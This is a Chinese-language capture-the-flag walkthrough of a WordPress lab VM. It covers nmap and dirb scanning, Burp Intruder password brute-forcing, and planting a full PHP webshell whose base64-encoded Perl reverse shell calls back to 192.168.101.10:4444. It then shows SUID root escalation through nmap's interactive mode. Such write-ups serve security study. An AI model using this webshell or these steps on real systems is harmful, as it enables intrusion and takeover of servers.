靶機下載鏈接: 百度網盤 請輸入提取碼 提取碼: sqv3
一、主機發現
1.用ifconfig查看kali的ip,因為kali和靶機都開啟了NAT模式,使用namp -sP 192.168.101.0/24探測靶機ip
二、信息收集
1.使用nmap掃描靶機
使用nmap -A 192.168.101.108 ,查看靶機開放的端口與服務。
2.使用dirb命令掃描靶機網站
用dirb命令掃描靶機網站,看看有沒有隱藏的網址或者配置文件,具體使用方法:dirb http://192.168.101.108
三、利用找到的信息,進行滲透
1.利用找到的網站尋找有用的信息
(1)掃描到一下可能有用的網站,先看http://192.168.101.108/robots這個網站,一般這里會寫哪些文件能不能爬蟲
一個txt文件,直接訪問這個txt文件,發現了第一個flag
2.字典爆破
訪問http://192.168.101.108/robots另外一個文件fsocity.dic
打開剛才的文件發現是一個類似字典的文件將獲取到的字典排序
剛才收集的網址里面有個http://192.168.101.108/wp-login.php,可能會用上字典
設置好火狐瀏覽器的Foxyproxy插件,自動啟用
啟用kali的brup suite抓包工具,具體操作如下:
抓包工具設置完成后,在用戶密碼那里隨便寫點東西
自動彈出,如下所示頁面,則抓到包了。
點擊右鍵將數據包發送給 intruder
選擇cluster bomb模式,添加用戶和密碼兩個參數
將剛才排序好的字典導入兩個參數中
字典添加完成后,點擊start attack,開始跑字典,由于字典較長需要跑久一點看到
一個length數值不一樣的就是正確的用戶密碼
接著嘗試用爆破出來的用戶密碼登錄一下該網站,結果成功登錄到后臺
3.利用wp-admin網站后臺上傳webshell
(1)修改404.php將webshell.php上傳
找到404.php,將webshell.php源碼粘貼到里面
webshell源碼
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.101.10";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
之后,先開啟監聽:nc -lvvp 4444 ,直接訪問404.php
訪問之后,反向鏈接到kali
4.滲透
優化命令執行終端,執行下面命令進入python交互式(注意要下載python環境才能運行):
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
(1)查看/home目錄有沒有flag
發現一個txt文件但是沒有robot的密碼,在robot目錄里面還有一個pasword開頭的文件還是md5加密的
解密該字符串
查看剛才的那個key文件,發現flag
(2)SUID提權
1.查看具有的SUID的二進制可執行文件:find / -user root -perm -4000 -print 2>/dev/null
2.已知的可用來提權的linux可行性文件列表如下:nmap、vim、find、bash、more、less、nano、cp
3.進入nmap交互模式,(僅限2.02-5.21版本):nmap --interactive
4.提權root:! sh
應用筆記(轉))
)
)